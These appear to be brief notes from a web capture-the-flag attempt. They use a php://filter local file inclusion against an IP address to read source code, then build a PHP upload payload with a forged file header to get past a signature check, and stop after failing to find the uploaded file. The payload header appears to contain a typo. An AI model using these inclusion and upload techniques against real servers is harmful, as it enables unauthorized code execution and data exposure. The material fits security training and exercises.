LFI :

http://45.77.45.157/?page=php://filter/convert.base64-encode/resource=CheckFile

=> Source :

function checkSign($handler){

		$header = fread($handler, 12);

		$type = substr($header, 0, 4);

		$size = unpack("n",substr($header, 4, 4));

		$signer = substr($header, 8, 4); 

		if($type!=="FILE" || $signer!=="CLWN"){

			return False;

		}else{

			return $size;
		}

	}

$fileSize = checkSign($f);


=> file payload :
ILE0123CLWN
<?php

phpinfo();
?>


=> upload success

$fileName = hash("sha256",$_FILES["files"]["name"]);

		$uploadpath = "tmp/";

		$ext = pathinfo($_FILES["files"]["name"], PATHINFO_EXTENSION);

		$upload_dir = $uploadpath.$fileName.".".$ext;  

encode filename to sha256 , but not find file upload => end
